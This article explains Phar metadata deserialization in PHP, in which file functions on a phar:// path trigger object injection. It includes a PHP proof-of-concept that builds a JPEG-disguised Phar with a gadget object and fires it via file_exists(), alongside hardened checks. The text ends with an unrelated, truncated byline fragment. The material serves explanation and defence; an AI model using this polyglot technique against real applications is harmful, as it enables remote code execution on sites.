Researchers have discovered a new attack technique that makes it easier to trigger critical deserialization vulnerabilities in the PHP programming language through functions previously considered low-risk. The technique leaves hundreds of thousands of web applications exposed to remote code execution, including sites powered by WordPress and Typo3.

PHP unserialization (object injection) vulnerabilities were first documented in 2009. They allow an attacker who can feed malicious input to PHP's unserialize() function to instantiate arbitrary objects and abuse their magic methods (such as __wakeup() and __destruct()) to mount a range of attacks. Until now, exploitation has depended on finding a code path that passes attacker-controlled data to unserialize().

The researchers claim that "an attacker can use low-risk functions against Phar archives to trigger deserialization attack without requiring the use of unserialize() function in a wide range of scenarios."

Phar is PHP's archive format, and a Phar file stores its metadata as a PHP-serialized value. That metadata is unserialized automatically whenever a file-system function (file_exists(), is_dir(), file_get_contents() and similar) accesses the archive through the phar:// stream wrapper, so the deserialization happens without any explicit call to unserialize().

To exploit the flaw, an attacker needs only to get a valid Phar archive containing the malicious payload object onto the target's local file system (for example through an upload feature) and then cause a file operation to open it via a phar:// path. The archive does not even need a .phar extension: the researchers showed that a Phar can be disguised as a JPEG image by modifying only its first 100 bytes, so the file passes image-upload checks while the phar:// wrapper still parses it.

The vulnerability was reported to WordPress last year and a patch was released; however, the patch did not address the issue completely.
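The following script is an added illustration of the mechanism described above, not code from the original report or from the researchers: it builds a Phar whose stub begins with a JPEG header and whose metadata is a serialized object, triggers the deserialization with nothing more than file_exists() on a phar:// path, and contrasts the vulnerable sink with a hardened one. The CacheWriter gadget class, the avatar.jpg and pwned.txt file names, and the hardenedCheck() helper are constructed for the demo. Creating the archive requires phar.readonly=0, and the automatic trigger through the phar:// wrapper applies to PHP versions before 8.0, which stopped unserializing Phar metadata implicitly.

```php
<?php
// Added example: Phar metadata deserialization via file_exists().
// Run with: php -d phar.readonly=0 phar_demo.php   (PHP < 8.0 for the automatic trigger)

// Constructed demo gadget. Real attacks reuse a class that already exists in the
// target application; here __wakeup() (called inside unserialize()) writes a marker
// file, a benign stand-in for the code-execution gadgets real chains end in.
class CacheWriter {
    public $path;
    public $data;
    public function __wakeup() {
        file_put_contents($this->path, $this->data);
    }
}

// Build an archive that is simultaneously a plausible JPEG and a valid Phar.
function buildMaliciousPhar(string $out, string $markerFile): void {
    $tmp = $out . '.phar';            // Phar::__construct insists on a .phar name at creation
    @unlink($tmp);
    @unlink($out);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'filler');
    // The parser only looks for the __HALT_COMPILER(); token and ignores everything
    // before it, so the stub may start with JPEG magic bytes (FF D8 FF E0).
    $phar->setStub("\xFF\xD8\xFF\xE0" . str_repeat("\x00", 12) . '<?php __HALT_COMPILER(); ?>');
    $gadget = new CacheWriter();
    $gadget->path = $markerFile;
    $gadget->data = "metadata was unserialized\n";
    $phar->setMetadata($gadget);      // stored in the manifest as a PHP-serialized object
    $phar->stopBuffering();
    unset($phar);
    rename($tmp, $out);               // the phar:// wrapper does not care about the extension
}

// Vulnerable sink: any file-system function on a user-controlled path. Opening a
// phar:// URL parses the manifest, which unserializes the metadata, which runs __wakeup().
function vulnerableCheck(string $userPath): bool {
    return file_exists($userPath);
}

// Hardened sink: refuse every stream-wrapper scheme outright and confine the
// lookup to the upload directory, so no phar:// URL ever reaches the parser.
function hardenedCheck(string $userPath, string $baseDir): bool {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userPath)) {
        return false;                 // phar://, data://, php://, ... are never legitimate here
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . basename($userPath));
    return $base !== false && $real !== false
        && strpos($real, $base . DIRECTORY_SEPARATOR) === 0;
}

$upload = __DIR__ . '/avatar.jpg';    // what an upload handler would have written to disk
$marker = __DIR__ . '/pwned.txt';
buildMaliciousPhar($upload, $marker);

@unlink($marker);
vulnerableCheck('phar://' . $upload . '/x.txt');
echo file_exists($marker) ? "gadget fired via file_exists()\n" : "no trigger (PHP >= 8.0?)\n";

@unlink($marker);
var_dump(hardenedCheck('phar://' . $upload . '/x.txt', __DIR__)); // bool(false), nothing parsed
var_dump(hardenedCheck('avatar.jpg', __DIR__));                     // bool(true), plain file lookup
var_dump(file_exists($marker));                                     // bool(false)

// Defense in depth for applications that never need Phar at runtime: drop the wrapper
// for the whole process (normally done once at bootstrap, before any user input is handled).
stream_wrapper_unregister('phar');
```

The first var_dump shows that the hardened path never hands a phar:// URL to the file-system layer, which is the property that matters: once the wrapper parses the archive, the metadata has already been unserialized and whatever gadget it contains has already run. Rejecting the scheme up front, confining file lookups to a known directory, and unregistering the phar wrapper where it is not needed are the controls an application owner can apply without waiting for a framework patch.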
By Akshay Rohatgi and Randy Pargman About this Student Research Project Binary Defense’s mission is